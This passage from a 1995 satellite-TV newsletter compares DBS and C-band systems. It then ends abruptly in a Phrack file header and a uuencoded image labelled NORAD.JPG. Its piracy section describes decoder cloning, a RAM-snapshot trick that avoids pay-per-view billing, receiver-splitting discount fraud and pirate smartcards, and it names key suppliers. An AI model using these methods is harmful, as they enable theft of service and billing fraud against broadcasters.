  14645. produced by both systems is excellent. Both systems will be
  14646. upgraded this year. Digicipher 1 IRD's (Integrated Receiver
  14647. Decoders) will be upgraded to the Digicipher II in 1995.
  14648. Customers will receive sidecar modules by mail and will
  14649. simply plug them in. Digicipher II will allow  greater and
  14650. higher quality compression so more channels may be carried.
  14651. While Primestar is using a proprietary compression system
  14652. developed by General Instrument, GI claims that Digicipher
  14653. II can be made MPEG II compatible. DSS is currently using
  14654. MPEG 1 but they will soon upgrade their system to the new
  14655. MPEG II standard. MPEG II is the accepted compression standard.
  14656. According to DirecTV the all necessary modifications
  14657. will be performed to encoders at the headend.
  14658.  
  14659. How DBS may Effect C-Band
  14660.  
  14661. C-Band systems receive more than just subscription programming.
  14662. There are many channels in the clear (unscrambled) including
  14663. Canadian TV channels offering American sitcoms. The Caribbean
  14664. Superstation, NASA, Main Street TV, E! the Entertainment Channel,
  14665. Court TV, C-SPAN 1 and 2, The Health Channel, Nostalgia,
  14666. America's Talking, National Empowerment TV, The Learning Channel,
  14667. and lots of religious and home shopping channels are all
  14668. available free of charge. With a C/Ku band dish it is possible
  14669. to receive at no cost approximately 120 FM stereo radio stations
  14670. from across the country. This includes jazz from Chicago, Christian
  14671. contemporary from LA, talk radio and nearly any other
  14672. existing format. It is also possible to get backhaul feeds of
  14673. most TV series. Episodes of these series are uplinked a week or
  14674. two before they are broadcast nationally so the cable companies
  14675. have time to insert the commercials which will be shown during
  14676. broadcast. Dish owners who watch the backhaul feeds see a blank
  14677. screen during the time provided for the insertion of commercials.
  14678. In addition, there are live news feeds from all across
  14679. the country. When there is a disaster anywhere in the world it
  14680. is possible to view the live feeds sent to North America by CNN
  14681. et al. In addition, local news departments will uplink certain
  14682. local clips for other stations across the country. It is interesting
  14683. to watch raw news feeds or press conferences in the after
  14684. noon and then see the network anchors apply their spin when
  14685. they narrate the story on the national news.
  14686.  
  14687. Those who purchase additional equipment can receive additional
  14688. services. An SCPC receiver costs about $400 and permits users
  14689. to listen to approximately 1500 radio services which are delivered
  14690. by SCPC (single channel per carrier) at frequencies
  14691. lower than those covered by a conventional satellite receiver.
  14692. These include syndicated radio programs like Paul Harvey, base
  14693. ball games, muzak, etc. Using a short wave receiver in conjunction
  14694. with a satellite receiver it is possible to monitor cellular
  14695. phone calls.  Usually only one side of the conversation
  14696. is heard because the other party is on a different frequency.
  14697. Other available services include WEFAX (weather fax) RTTY and
  14698. satellite data. Using special receivers and paying subscription
  14699. fees it is possible to receive services like internet feeds or
  14700. real time stock market quotes.
  14701.  
  14702. The entertainment programming available by C-band is essentially
  14703. the same as that available by DBS but it is considerably
  14704. cheaper. A VideoCipher II PLUS decoder and a subscription
  14705. is required . There are some regional network affiliates from
  14706. places like Denver, Chicago, Raleigh, LA, Dallas, Boston, and
  14707. NY which are not available on DBS. This year the Digicipher II
  14708. decoder will be introduced. It will be able to decode both
  14709. analog and digital signals. This does not mean that the analog
  14710. Videocipher II PLUS decoder will become obsolete. There are now
  14711. over 2 million subscribed VC II PLUS units and that is not a
  14712. market which any programmer would abandon. Current BUD (big
  14713. ugly dish) owners and those considering buying one should know
  14714. that space is scarce on C-band satellites. Hughes Communications
  14715. has just sold the last of its capacity on two of its
  14716. satellites, one of which has not been launched yet and there
  14717. are several satellites scheduled for retirement in 1995.
  14718. The shortage is even filling up Ku band transponders. This is
  14719. happening at a time when there are literally hundreds of
  14720. programming channels ready to launch.
  14721.  
  14722. Transponder space on Galaxy 7 currently costs $180,000 per
  14723. month. and because of the  shortage, transponders which
  14724. would ordinarily cost $50,000 are going for $150,000. The
  14725. solution for cable programmers is digital compression. At
  14726. 4:1 compression it is only necessary to rent 1/4 of a trans
  14727. ponder and it is a new technology so compression ratios will
  14728. improve even more over time. This will allow even more channels
  14729. to be carried per satellite transponder.
  14730.  
  14731. Many BUD owners who remember when a $150 Videocipher II was
  14732. "the only decoder you'll ever need" and who have upgraded
  14733. to a $399 Videocipher II PLUS within the past couple of
  14734. years and who now face the prospect of upgrading again to
  14735. a Digicipher II in order to receive digital programming
  14736. are interested in any alternative they can find. One
  14737. example of programming which is available in digital
  14738. format but which is not offered to dish owners is the
  14739. Encore Multiplex. In addition to Encore, there are six
  14740. niche channels devoted to mysteries, westerns, love
  14741. stories, action, true stories/dramas and youth programming.
  14742.  
  14743. Several companies are betting that consumers will choose
  14744. to add DBS receiving equipment to their existing systems
  14745. rather than upgrade to Digicipher II. It is likely that
  14746. the price of DBS equipment will decrease when Sony starts
  14747. manufacturing systems this summer. It is hoped that programming
  14748. prices which are now significantly higher than C-band may
  14749. decrease slightly as well.
  14750.  
  14751. Norsat is manufacturing a C-band/LNBF and so is Pro Brand
  14752. International. They are also producing a C/Ku band/LNBF.
  14753. These products will allow a BUD owner to continue to use
  14754. his dish for all satellite delivered programming without
  14755. having to replace his analog satellite receiver with a new
  14756. digital/analog model. This will be the first time BUD owners
  14757. will have had a choice in what decoding equipment they might
  14758. purchase.
  14759.  
  14760. Those now contemplating the purchase of a dish system can wait
  14761. until Digicipher II is released this year, or they can consider
  14762. a big dish with an analog receiver to receive the free programming,
  14763. and a DBS system for subscription services. It is
  14764. clear that an analog receiver with a Videocipher II decoder
  14765. is, by itself, a dated product.
  14766.  
  14767. Piracy
  14768.  
  14769. While equipment manufacturer General Instrument claims
  14770. that the Videocipher II data stream was shut off over a
  14771. year ago, it is still being used for some services.
  14772. These include regional sports networks including various
  14773. feeds from Home Sports Entertainment, Sports Channel,
  14774. ADC, Pacific Sports Network, and Sunshine, AMC, Nick E,
  14775. Life E&W, WWOR, MTV, Discovery E&W, VH1, CMTV, ESPN E&W,
  14776. CNN W, TBS W, WGN, CNBC W, TNT W, TNN W, USA E&W, CHN,
  14777. A&E W, Youth (Canadian). These services are still being
  14778. transmitted in VCII mode because not all cable companies
  14779. have installed VCII PLUS decoders at their headends.
  14780. The working keys for these channels change every few days
  14781. and they are subject to an on-going ECM (electronic
  14782. countermeasure) program so audio is not always available
  14783. for all channels.
  14784.  
  14785. There is software available on BBS's which allows users
  14786. to receive audio and video on these channels. Authorized
  14787. seed keys are necessary. The net effect is to  clone the
  14788. VCII to the decoder which is really using those keys.
  14789. EPROM chips loaded with working keys are available for
  14790. about $50 and they work until GI extracts the keys from
  14791. them and shuts them off. The most practical way to obtain
  14792. audio and video for these services is by connecting a modem
  14793. to the VCII decoder. Every few days the user can push a
  14794. button on his remote control to download the latest keys.
  14795. This method has been abandoned by most individual users,
  14796. because the long distance charges, hardware upgrades, and
  14797. aggravation is not worth the cost. There are some satellite
  14798. dealers who still use the system for their customers.
  14799.  
  14800. Many of those who still use their VCII boards, employ them
  14801. to obtain video-only on PLUS encoded adult channels. There
  14802. are several available, ranging from softcore to XXX. They
  14803. include Adam & Eve, Cupid, Exxxtasy, LVTN, Network 1, Playboy,
  14804. Spice 1, Spice 2, and TV Erotica , Video-only chips are
  14805. available and EPROM files are available on many BBS's.
  14806.  
  14807. Some individuals pirate the 10 TVN PPV movie services on T3
  14808. on an 029 PLUS board by taking a "snapshot" of the RAM at
  14809. the start of the month. They watch all the movies they want
  14810. to during the month, and then at the end of the month they
  14811. reload the data captured at the start of the month. When
  14812. the unit is polled for PPV purchases it shows none so they
  14813. are not billed. There is a period of approximately 10 days
  14814. at the end of the cycle when no movies are watched. Many
  14815. individuals misuse the Surewrit 9 test device for this
  14816. purpose.  We have a file on the BBS called Plusmap.txt
  14817. for those interested in studying further.
  14818.  
  14819. Oak
  14820.  
  14821. Oak encrypted services on Anik include the network feeds
  14822. from Detroit, and sports, movie news, and Canadian channels
  14823. which offer mostly U.S. programming. Discovery is now Oak
  14824. encrypted as well. The Oak board is available in a VCII
  14825. cardcage and some sources are selling these for $299. What
  14826. they are selling is stock boards which must be subscribed.
  14827. In order to clone the board to a working ID, the micro-
  14828. processor must be changed to a Mostek. Oak is not subject
  14829. to the ECM's which affect the VCII datastream.
  14830.  
  14831. B-MAC
  14832.  
  14833. There is a relatively new B-MAC product. It is a keypad
  14834. which allows users to manually enter working keys instead
  14835. of using a modem system to download them. Unlike the
  14836. system being sold in Canada, this system does not encrypt
  14837. the basic working keys which are for the Hi-Net service.
  14838. Individuals may obtain keys from any source, instead of
  14839. having to rely on one supplier. Keys for special PPV events
  14840. are encrypted. The complete U.S. system including decoder,
  14841. software and keypad sells for approximately $1600.
  14842.  
  14843. DSS
  14844.  
  14845. According to RCA, the receiver must be connected to a phone
  14846. line. Where the deluxe system is installed, they say each
  14847. receiver must be connected to  the same phone line via the
  14848. 1200 baud modem. (The unit also has a 19,200 modem). The
  14849. phone line is not used to transmit authorization data to keep
  14850. the receiver running. The receiver calls out monthly to report
  14851. what pay-per-view movies have been ordered. It is also used
  14852. to verify the location where the system is installed.
  14853.  
  14854. Some individuals install the units at remote cottages or RV's
  14855. where there is no phone. In this case, DirecTV has a backup
  14856. system so individuals without phones may order PPV events
  14857. manually by calling their 800 number. There is a $2 charge
  14858. in addition to the cost of the movie for this service.
  14859.  
  14860. As long as the unit is not connected to a phone line, the
  14861. system operators have no idea where it is, so it could be
  14862. in Canada, Mexico or the Caribbean. Some U.S. individuals who
  14863. wish to obtain local blacked out sporting events use a billing
  14864. address different from where the unit is installed, for this
  14865. purpose. It is still necessary to purchase the NFL, NHL, NBA,
  14866. etc. package and the unit must be connected to a phone line.
  14867. Mail drops usually advertise under Mail Boxes or Telephone
  14868. Answering Services.
  14869.  
  14870. Those who purchase a deluxe system including a second receiver,
  14871. obtain a programming discount for the second receiver. The primary
  14872. receiver pays full price and DirecTV charges $1.95 extra and
  14873. USSB charges $1 per month for programming received on the
  14874. second receiver. The second receiver receives whatever programming
  14875. is subscribed to on the primary receiver.
  14876.  
  14877. Some dealers split systems. They place the primary receiver in a
  14878. friendly location. The secondary receiver is typically sold to a
  14879. Canadian. The dealer charges the full price for programming but
  14880. only has to pay $1.95 plus $1. This can amount to a profit of $60 per
  14881. month, every month per customer and is more profitable than VCII
  14882. piracy was for many of them. We have heard that some installers
  14883. have been requested to connect both receivers to the single
  14884. phone line during authorization and that they have done that
  14885. before splitting them up. We have also heard that some
  14886. individuals have told DirecTV during the authorization process
  14887. that the primary receiver would be located at their residence
  14888. and the secondary would be located at a remote cottage and
  14889. they have received the discount but they are not able to order
  14890. PPV on the secondary receiver. Some individuals are selling a
  14891. unit which intercepts the 800 number the receiver is programmed
  14892. to dial and routes the call to a U.S. number where the 800
  14893. number call is then placed. These units will be necessary this
  14894. fall when the football season begins, at least for those who
  14895. don't have a pirate smartcard.
  14896.  
  14897. The dialers being sold now cost $125 and Canadian consumers
  14898. who purchase them are unaware that hundreds of their
  14899. calls are being routed through the same US phone number.
  14900. It is only a matter of time before this system is shut down. Advanced
  14901. Technologies will soon market a system which allows the user to
  14902. set up his own network. Another company is developing a system
  14903. which allows the user to manually enter the phone number being
  14904. used. The only other problems we have heard regarding this type
  14905. of gray market piracy is when foreigners have ordered PPV events
  14906. while having the receiver connected to a phone line. In some cases
  14907. they have received mail messages to their dishes requesting that
  14908. they contact DirecTV to verify that their systems are in the U.S. Then
  14909. they have been told that if DirecTV receives calls from a foreign
  14910. area code their programming will be discontinued. Some do not
  14911. order PPV events for this reason and others order manually.
  14912.  
  14913. The major news which occurred just before we went to press is
  14914. that the RCA system has just been hacked. According to reliable
  14915. sources a nearly six month effort on the part of a U.S.-European
  14916. coalition has lead to the compromise of the system. Current
  14917. plans involve the issue of 4 tiers of pirate cards. The Blue
  14918. card will offer only basic programming and will cost approximately
  14919. $150. The next level card will include the subscription
  14920. movie channels, the next level card will also include the sports
  14921. channels together with packages like the NFL etc. The Gold
  14922. card will be a global access card which will allow access to
  14923. all services and will include a limit of $500 in PPV program
  14924. ming. Note that the pirates are now limiting the amount of
  14925. PPV events their customers will receive. To prevent the
  14926. pirate card from being pirated it will employ a kill routine
  14927. so that once it is inserted into the card slot in the receiver
  14928. it may not be removed without dumping the memory.
  14929.  
  14930. It will be necessary for those who engage in this type of
  14931. piracy to mail in their existing cards or otherwise supply
  14932. their unit ID in order to provide necessary information. Each
  14933. pirate card will be unique to a specific receiver. Programming
  14934. will be done in Canada where it will ostensibly not be
  14935. illegal, at least for now. Three Canadian companies will
  14936. essentially have franchises and will receive the necessary
  14937. hardware/software.
  14938.  
  14939. Release of the cards is expected around April, depending on
  14940. two factors. The developers want to wait for the release of
  14941. the series 10 Videocrypt cards in Europe. At this time the 09
  14942. series pirate cards are being heavily ECM'd and a new release
  14943. is imminent. One company supplies the encryption algorithms
  14944. for both U.S. and European cards. The U.S. card is based on the
  14945. 09 series card in Europe. U.S. developers don't want their card
  14946. reversed and counter ECM'd in the 10 series so they choose to
  14947. wait. They also want an installed base of about 800,000 systems
  14948. to make it more costly for system operators to issue a new
  14949. series of cards. They have said in interviews that it costs them
  14950. up to $35/card if they have to issue a new series because of a
  14951. breach of security.
  14952.  
  14953. In the past, we have sometimes been able to alert our readers
  14954. several months in advance to events which would transpire.
  14955. When we have done that, some entrepreneurs would immediately
  14956. offer products which did in fact not yet exist. This is March 11, 1995
  14957. and there is no pirate card for the RCA system available anywhere
  14958. at this time nor will there be in the very near future. We will be
  14959. allowed to see the system somewhere offshore and we will report
  14960. our findings. Do not send money to anyone. We will have more DBS
  14961. news next time together with more discussion of the issues
  14962. involved. Do not send money to anyone.
  14963.  
  14964. Resources
  14965.  
  14966. Satellite dish dealers are experts in the reception of satellite
  14967. delivered programming. hey are skilled in installation, maintenance
  14968. and repair. Many now carry both DirecTV and Primestar.
  14969. They are able to discuss the relative merits of each system. A
  14970. bonus is that many satellite dealerships are "mom and pop"
  14971. type businesses so potential customers are often able to
  14972. deal directly with a proprietor who possesses knowledge
  14973. and experience. Their biases: Some dealers have not been
  14974. able to obtain dealerships for DirecTV and others refuse to
  14975. carry it because they see it as a threat to their businesses.
  14976. A dealer makes about 1/3 profit or $1000 on the sale of a $3000
  14977. full view (C-band) system. The profit on a $699 DirecTV system
  14978. is about $120 plus a possible installation charge.
  14979. Primestar is a little more lucrative for the dealer than DirecTV.
  14980. Primestar dealers profit from the sale or lease of the
  14981. systems, from installation (which is mandatory) and they also
  14982. earn commissions from programming ordered by their customers.
  14983. Commission Salesmen working at consumer electronics stores are
  14984. useless as sources of information.
  14985.  
  14986. Miniature Satellite Dishes is a Frank Baylin book which
  14987. discusses the DirecTV and Primestar systems. There is
  14988. information on the basics of satellite communications,
  14989. the receive site, a comparison of DBS systems, signal
  14990. security, programming, installation instructions, and connecting
  14991. components to the system. There is some theory.
  14992. The book is a good primer. It is easy to read and it is well
  14993. worth the cost for those who want to know more. Baylin
  14994. Publications. 303.449.4551.
  14995.  
  14996. Orbit is a C/Ku-band programming guide. It includes both
  14997. free and subscription programming, audio services and
  14998. backhaul feeds. You can see what is available on a C-band
  14999. system. The ads for various programmers allow comparison
  15000. of the cost and availability of programming with DBS. C-band
  15001. programming is substantially cheaper. VCRS decoders are
  15002. available at a discount when purchased with programming.
  15003. Competing publications include Satellite TV and OnSat. These
  15004. are available at most magazine stores.
  15005.  
  15006. Satellite Direct is a monthly programming guide. It divides
  15007. each 8 hours worth of programming into two facing pages.
  15008. It is cleanly laid out and easy to follow. It is available at most
  15009. magazine stores.
  15010.  
  15011. Consumer Hot Lines. DirecTV's answer line for those who have
  15012. questions about programming or equipment is 800.264.4DTV.
  15013. USSB's number is 800.633.2820. Those with questions about
  15014. Primestar equipment or programming may call 800.932.2007.
  15015.  
  15016. Bomarc Services is producing a set of schematics for the RCA
  15017. receiver. They are contract reverse engineers and they have
  15018. thousands of  schematics available for all kinds of electronic
  15019. devices including most cable boxes. A catalog costs 4 stamps.
  15020. Bomarc Services, Box 1113, Casper, WY, 82602. No phone.
  15021.  
  15022. S&J Electronics is one of the few companies left which still
  15023. carries VCII test devices. They have video only chips for
  15024. those who want to view PLUS video-only on a VCII. They
  15025. also have chips which allow VCII users to receive audio/video
  15026. on the 28 services which still  employ the VCII data stream.
  15027. They are also a supplier of B-MAC's and the keypad
  15028. system. 201.728.3217.
  15029.  
  15030. Triangle Products is the major supplier of Oak decoders.
  15031. They are available in VCII card cages for those who don't
  15032. wish to use free-standing units. They also carry SureWrit 9,
  15033. which is a diagnostic test device for those studying VCII or
  15034. 029 PLUS technology. They have raw B-MAC's as well.
  15035. 616.399.6390.
  15036.  
  15037. Travel Sat is advertised as a satellite in a suitcase. Included
  15038. is a complete RCA DSS satellite system, a 16 inch fibreglass
  15039. dish, hardware components made of stainless steel (to prevent
  15040. corrosion) and a signal strength meter so a television receiver is
  15041. not required to set up the system. They also manufacture a roof
  15042. mount for RV's. 800.270.1692.
  15043.  
  15044. Eagle Aspen DBS To-Go consists of a plastic case containing a
  15045. 14 inch dish, a DBS compatible LNBF, hardware kit, compass,
  15046. and cables. Options include a power inverter. It is suited for
  15047. those who want to mount a permanent dish at the cottage and
  15048. simply move the receiver back and forth, or for those who want
  15049. a portable satellite system. 404.423.7072.
  15050.  
  15051. TCC BBS is an originating source of satellite TV piracy
  15052. information, test files and working keys for the VCII. The
  15053. sysops are active in answering questions. They are also
  15054. knowledgeable in other areas of hacking, electronics and
  15055. computers. BBS 809.394.9001.
  15056.  
  15057. New Advanced Technologies is another B-MAC supplier, they
  15058. have test chips for the VCII and they will soon market a DBS
  15059. dialer which will permit the user to set up his own network.
  15060. 514.458.3063.
  15061.  
  15062. (C) Scrambling News 1995. 716.874.2088. snews@buffnet.net
  15063.                               ==Phrack Magazine==
  15064.  
  15065.                  Volume Six, Issue Forty-Seven, File 17 of 22
  15066.  
  15067. begin 644 NORAD.JPG
  15068. M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
  15069. M_]L`A``+"`@*"`<+"@D*#0P+#A$=$Q$0$!$D&1L5'2HE+2PJ)2DH+S5$.2\R#
  15070. M0#,H*3M0.T!&2$Q,3"TX4UE22EA$2DQ)`0P-#1$/$2(3$R)),"DP24E)24E)!
  15071. M24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24G_D
  15072. MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
  15073. M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
  15074. M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
  15075. M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
  15076. MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
  15077. MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
  15078. M!V%Q$R(R@0@40I&AL<$)(S-2\!5B<M$*%B0TX27Q%Q@9&B8G*"DJ-38W.#DZF
  15079. M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J"@X2%AH>(B8J2DY255
  15080. MEI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(R<K2T]35UM?8V=KBX^3E&
  15081. MYN?HZ>KR\_3U]O?X^?K_P``1"`&A`H`#`2$``A$!`Q$!_]H`#`,!``(1`Q$`Y
  15082. M/P#T'%*![5N9"XHQ0`8HQ0`N*7Z4`)]W&>,TM``*2@!5^E+BF(3TIU`!CBB@P
  15083. M!<4N.:0PQ1B@0H%*%XR>!2``<'@?C7*>%M0N+G7O$5I+(3!:W6(4(^X"6SCZP
  15084. MXS2ZE=#J>U+BF2)BBF``4NSG/3ZT``"COGZ4A)'3CZ4`)GFDQQ0(3M2=A3`,>
  15085. M<\4NSCG`H`#M';/UI,GMQ]*`$VD]!1L`ZD#Z4"&$C^[Q[TF2>],!I%-(Z4"$=
  15086. M-(>O2F`TBDVT`(1ZTTCFF(0C\*0B@!A%)M.:8AK#%-VTP&L.*:1Z4"&D=:;BV
  15087. M@!I'!%-VTP&$4PK3$-V_E32*8#&&*:10(81^-,(YI@(!AJ6@!A%,/ZU0AA&/$
  15088. M:FXH`]%QQ3@*XSJ#%&,4`&/6@#%`"T9`&:`%`YS^5':@!,<]**``4M`!_C2C>
  15089. MK0`8XHQS3$.(H'6D,`*<%.,]!2`7@=/S-)WYH`3!KAO!SD^-?%B?]/`//^\U"
  15090. M+J/HSNL<44Q`$)YQ2[0#R<_2@+"`\?+Q2'KG.?>@!,<<48IB#%-QSQ0`OEG'V
  15091. M)Q28`'0F@!,MG@@"@*?2C8!"%!&6Y["C@=!^=`"$YZFFFF(0CGFFD4Q!BFD4Z
  15092. M`(1Q2$#-`"&DQ[8IB$Q@4PX%`!CTII'%,0A'/%-V]A0`UACK3<?A3$(132N*@
  15093. M8#,<TA%`AI''%-V\^E,!A6F$4Q#2#VIK+Q0`QAQ3,`C-,!"M1D<TQ#0O-*5P?
  15094. M*`&8J/;SS3`81^=)BF(]$[4HKC.H7%%(`HH`,4N*`%`I,4`(11CFF`H'%)CT:
  15095. MH`7Z"E_2@``XI<4`*1P:<%]>!2`.!]WCZTG)ZYS0`#I2@<T`%<#X/60_$#Q/5
  15096. MA&\OS&RV.,[SWJ7N-;'H&U<<G\J,CL/SIB&L2>II/I3`44$4``'H*4IZG%`61
  15097. M#"]LFFDGMQ]*`$VDC.*,`#D_E3$)D#H*0Y/K0`TBDQS0("*2F`F*;CF@`(]*C
  15098. M;WH$)CI2$4P$/I1ZT"&XIN.^*8!CTI"*!#"N/6DQUI@-(I-M,0UA33P10`A7_
  15099. MK3-O'>F`FW`Z4S;S0(85[<BFD<]!3`932O'`IB&,./2FD=<4P&D4PB@0S'S4N
  15100. MI&*8#"*C(YI@,84TCM3`]#I17$=0M%`!0.U`!@4N*``#TH(Q0`4G?I0(444`0
  15101. M%`ZT`+FG;3W.*!CMV.@_&D[\GF@`]<4`4A`[K&C22,%1!EF/``]:9:7-O>VZ'
  15102. M7%O,DL3\JR'-`[$N5'W5'XUP6@7,TGQ1UZ.>9I%6,A`6X4;EX`_&IZH=]&=X9
  15103. M.E!JB0I0"3P*`%V>I`]J.!T&?K0&P@8X]/I2,,#D&F`#KR.*,_-A0!0`G/4G_
  15104. M-)CB@0F*,4`)C%-YW<@8_6F`8HQ0(C*MG[V!Z`48H`0BFXI@(11@T"$(Q1BF1
  15105. M`F*0B@0A6FE3FF`A&!3=O'2@!I%)BF(1A^%-P,^E,0PCDTF/I0`W932N*8AA8
  15106. M&.E,(I@,(II'%,0U@?;%,8<4(!N.PIC#GBF(:`0:",4P&$5&13`81CO3""",&
  15107. MCBF!Z%VI17$=044`!H':@`I1[XH`6@\T@$%'>F`@HH`,=JQ]8\26>D$QR2#S"
  15108. M^RXS^@_KB@#`@^(PWR&;3\1`_(8Y,MCWS73Z7K=EJP8V=P)&5060G#+GVJG&F
  15109. MPKFIZYI1UJ1B@>E*`%/)S4@1W2O-:31QA2S(0%8X!R.Y'-<A8:SJ/ANU2VU?[
  15110. M09([=/\`EO9_O5^I'-"'?0W],\1Z3K`'V*^AD8_P%MK?D:X_0'8_%W700!^Z8
  15111. M8?ELHZA:R/10I(Z&E*X'49]*+B&@$>G':G$DG`_*F`FS((;&/2EX';-``#Z#S
  15112. M%(?I0(3%-Z&@!V.*3%,!*7%`"$4@%`A"*,>E`#=M4+J_CLYE$APK'%14GR*[8
  15113. M+C&[L):ZI:WI<1.-R$!E/;/(J#4-8@TRYCCN'50_0DTIU.1)L(PN[$MEJ5MJK
  15114. M4`FMI%92<=:M"M$[HAJS#`H(Y-42&*3%`#<?E01Q3$,(I,<4P$*\TW%,0C+@T
  15115. M4W%`#=O)IN.,4"&D>E-QSP*8#".::5XIB(ROI32*8AI`QR*81Q3`:13",'WIN
  15116. M@-"X(HV\4Q#&'%1D<\4P(V&:810!V-OK>FW40DAOH'4G`^<#]*<=;TQ51C?P;
  15117. M;6.`=XY-<G*SIYD11^)-(E)"7\!Z#[V.O_ZJ?;:]I=X0+>_@=B,@;\']:.1AW
  15118. M=%Y)$E7,;JZ],J<TX5(Q:J76JV-BNZYNHXQNV\MW]*:5]@O8H-XNT96@5;Q6+
  15119. M\YMH*]%]V]!523QUH)9XGED*YVDF(E2/\*KD8KHTK+Q'I5\@>&]C^9]@#':24
  15120. M?H?I5]KB%&"M*@8G`&[DFDXM!=',:WXXBTK4/L4%H;EB@(=6_B/0`8YKGY_%%
  15121. M6L62E;^]2%V.3&D8:0#T'8?B::5AF/>>)]199EMKF:))``[ERSL.W/;\,5B[C
  15122. MI)6"EVYY^:KL2V(3+%F(@<>E36FHW%K<QSV\ACF0Y5AVIB.C\.^,-6L[5XQ&S
  15123. M+J%&/[R9B`F>VXG]*]`T;Q-I^JNMO'.GVT+EXAG`(ZX)'(K.2N]"EHM3:W$^\
  15124. MWM0*@8HI12`YK6O"VE7E\;F^M5\NXPK3(=CQOT4Y'4'I[''J:XC3;'4M-^(E#
  15125. M]9Z)/#)/"C8>\R=Z84[20.O3GVJ>MB^AT<>M7FCZS/J'B'3+VV\R-8S);MYD>
  15126. M'U(SQ^O4^M=%%XGTR[T^6YL+E+ID3<(4;#MCM@TUHA-7-.SN1=6<4Y@DA,B[#
  15127. MO+E`#+]<5-D^O%,0@'%&*8A.]+B@!*,4"%`-)CI0`F*7%`"8P:`.:`$(]*"*"
  15128. M`(C*@)RP&/6N<\8O#!IPF,JK+NP@()!/;I7/7:<&C6FGS'+MJ\.A:BLTDF>%9
  15129. M1L#'/3)'YURVK:ZVH(7GQ)-O(WC^[G(/UX_6N>$I5(IEM*+-?X<6EY=ZC)=A>
  15130. MF%E;DYR>K'_ZU>IB5#T89QD5Z,4['/+<?_*EIDA1BF`F.:0K0(81^5)MIB$(8
  15131. MQUIN*8`13<4"&[>O--(P*8#""%)"Y]!2!30(85XIA'K5"&[>:85H`:1@8'2FK
  15132. M$?A5"&E::5H`9MP:"M,0PKQ416F!&R_G3"O/]:8'F@8@<'%2JV(]W4^_:LC<1
  15133. M'SNR#D4K$``8_'-`%K3=5N])N!/9W#1N.,9X(]Q6M)XZUYU4+>;<'J$'-#BGS
  15134. MN%RK=>*=7O8PMQ>2LH_NG;WSVK.$^2"Y9B??FE:VP7'1QR28PQ`Q\V>U-;RD.
  15135. M4AG+&@!\$0FE$<7SLWW47DFMNRLXH][7$VTHI811ON<G'KT'ZGVJ92*BKE*_!
  15136. MU&89\@"%2@7>IRV/3<>?P&!38T6Z<"4G#C*DCI]:-E<-RS;Z.UQ83LI(*.%R8
  15137. M1GMT]L?RJ.YTZ#[/&;68RW`8@PCD*,]<]_2N=8A<UB_9Z7(/[)OU4RL%CC(PW
  15138. M7E.T?KU_"H3+8V_$2?:9/^>C@JGX+U/X_E71>^Q%K;D,\]S>X9V+!.%50`J>H
  15139. MP`X%.1KN*1)X7=98^CH<$&GHA;G::)\1;J!U@UB$S*H`\V(?-]2.]=SH&MPZ!
  15140. M[IZW,/#`[73^Z:B22V&C6`P>3BE#`=!^-9E;#)(EN(GBE421N"K`]"*\QTR6S
  15141. M/2_BM??:9WE^1HU.-S.<#:..IP*E[H:V9Z+'!+=,)KU=JJ=T<'4)Z%CW;]!^)
  15142. MM4]2\):-JA=Y[)(Y6ZRP_NVSZDCK^-,5[/0TK*S6QLXK9)))%B7:&D;<Q^IJ]
  15143. MQBF(0"E-`""C`H``*,<T`*.U)B@!,4N*`#%(!0`8J*9S%&6`)P,U,G9-C2NSN
  15144. MEM8OVTY))+J5<NI*<<(#GC^5<;K.O27MFHA9)0QP#CTS^?/^>:\I7G+78ZGH!
  15145. MC!U#2[_49KJ=FC2&)?,9B>H]1_GN/PYR4_-@-D5V46K670RDK/4[GPCXCL]*>
  15146. M\/7UM(HB;:7#Y^:5NG'TJGIWC.Y\V.*9RD9"QNZGDJ/3WKM4TC!Q/6--U*TO'
  15147. MK=6M95=0!WSBKX[TV2&.M'M0`8Q28I@-(I-IH$(5_2FXZ8IB#;]12$4`-VBFX
  15148. M%>*8A"!3<4Q#2*C9>E-`-V^E,93CIBF(:R\4TK3`:1497%,0W'-&*8$;+Q435
  15149. M+SZ4Q$;CWQ3"*8'E^,"G!L#':LC<7+$;L'&.PI,],F@!0>,Y_"C=S0`^/!)RV
  15150. M3@=A4H>-,;1DGU[4@)8K>:X++#F0]U7^9]*D%I;VC(]W/Y^3_JH#D?\``FZ#"
  15151. M\,_A2OT0[#9[QRLBVX6"W+89(QC=]3U/XTEA<M;RAX/O9X!HMH%S2L-(EU*X+
  15152. MAA+",.=H+G@?A5^.VL-+D_TL-*B-@D'CZX':N3$5^7W8FL(7U87VOZ<4(M)5:
  15153. M:*/#;!GY\=<Y_G7.P:A;HMP8"L4FX/&Q.TCJ<#]*Y(0DKFLI($U>ZU&]\VZDE
  15154. M+D=<42VW[Y648C;G%>C2LHV.>6K+$RX01Q84`8!'>BWM[AI@($,BJNZ0YP%],
  15155. M\G@5>VXB9H;)8_W\YFE'(BA/8^KGC\LU)8^)+_1YC)IXA@3C?&JYW#_:8\FAX
  15156. M:[@]#O\`3_'MO.L37MJ]G$^XF25P``!P0.K9YZ5T-EKVF7R!K6\BDST&<'\JV
  15157. MAQ?0=[;FANSUKS72\#XRW^#_``MT_P!P5'4KH>F#I2TR1:!0,7MQ2'K0`F*7\
  15158. MI0(3\*.@R>@H`4=C10`"@#GK0`AHH`2LO77D6SQ"VR3/RMZ5C7=J;L7#XCS.^
  15159. M\N?M'VHZAEN3&GS$8Q[=ZY:62.&(1VS9\MVS(XVD\\8_"N*DON-9E62Z<2*\<
  15160. M<A(R#M[8%2"U%SFXN8_LZ_=PBD#/^-=:]V)ENRA=[FEX8.H``*CC`'I2V%I-]
